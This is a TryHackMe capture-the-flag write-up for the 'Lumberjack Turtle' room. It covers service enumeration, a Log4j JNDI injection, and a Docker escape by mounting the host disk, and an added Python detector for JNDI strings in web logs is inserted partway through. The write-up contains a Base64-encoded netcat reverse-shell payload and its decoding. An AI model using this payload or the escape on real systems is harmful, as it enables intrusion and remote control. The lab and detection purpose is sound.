TryHackMe: Lumberjack Turtle
TryHackMe Lumberjack Turtle write-up
- Name: Lumberjack Turtle
- Description: No logs, no crime… so says the lumberjack.
- Room: tryhackme.com
- Difficulty: Medium

Services enumeration
Let’s use Nmap to enumerate the services. We discover two ports:
command: nmap -sC -sV <Machine-IP>

Web enumeration
We scan for directories with gobuster.
command: gobuster dir -u http://10.10.18.151 -w /usr/share/wordlists/dirb/common.txt

There are no properties in these two paths

log4j detection

Check for the Log4j vulnerability.
payload: ${jndi:ldap://<IP>:<PORT>}


The application appears to be vulnerable.
Log4j
JNDI Injection Exploit

Send the payload.
payload: ${jndi:ldap://10.4.44.217:1389/Basic/Command/Base64/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjQuNDQuMjE3IDQzMjEgPi90bXAvZg==}
The Base64 part decodes to: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.4.44.217 4321 >/tmp/f
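
From the defender's side, a request like the one above leaves a recognisable trace in web logs. The following is an added example, not part of the original write-up: it scans log lines for the JNDI lookup shape shown here, undoes percent-encoding, and decodes any /Command/Base64/ segment so a responder can see which command was requested. The function names, the log format and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Matches ${jndi:<scheme>://<host>[:port][/path]}, the lookup shape used in this write-up.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
# Path convention seen in the payload above: .../Command/Base64/<data>
B64_CMD_RE = re.compile(r"/Command/Base64/([A-Za-z0-9+/_=-]+)")

def decode_command(path):
    """Return the command carried in a /Command/Base64/<data> path, or None."""
    m = B64_CMD_RE.search(path or "")
    if not m:
        return None
    data = m.group(1).rstrip("=")
    data += "=" * (-len(data) % 4)  # restore padding that may have been stripped
    try:
        return base64.urlsafe_b64decode(data).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan(lines):
    """Return one finding (dict) per JNDI lookup found in the log lines."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for _ in range(3):  # undo up to three layers of percent-encoding
            line, previous = unquote(line), line
            if line == previous:
                break
        for m in JNDI_RE.finditer(line):
            findings.append({
                "line": lineno,
                "scheme": m["scheme"].lower(),
                "host": m["host"],
                "port": int(m["port"]) if m["port"] else None,
                "command": decode_command(m["path"]),
            })
    return findings

# Constructed log lines (documentation IP ranges, harmless command "id").
SAMPLE_LOG = [
    '198.51.100.7 "GET / HTTP/1.1" 200 "curl/7.79.1"',
    '198.51.100.7 "GET / HTTP/1.1" 200 "${jndi:ldap://192.0.2.10:1389}"',
    '198.51.100.7 "GET /?q=%24%7Bjndi:ldap://192.0.2.10:1389/Basic/Command/Base64/aWQ%3D%7D HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding whose host is outside your own address space, especially together with a decoded command, is worth correlating with outbound LDAP connections from the application server.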

After sending the request…

The first flag

Root flag
Docker escape

Mount xvda1 on /tmp/esc.
command: mount xvda1 /tmp/esc


This is not the original flag, so we have to look for the real flag.

thank you 🌏🔥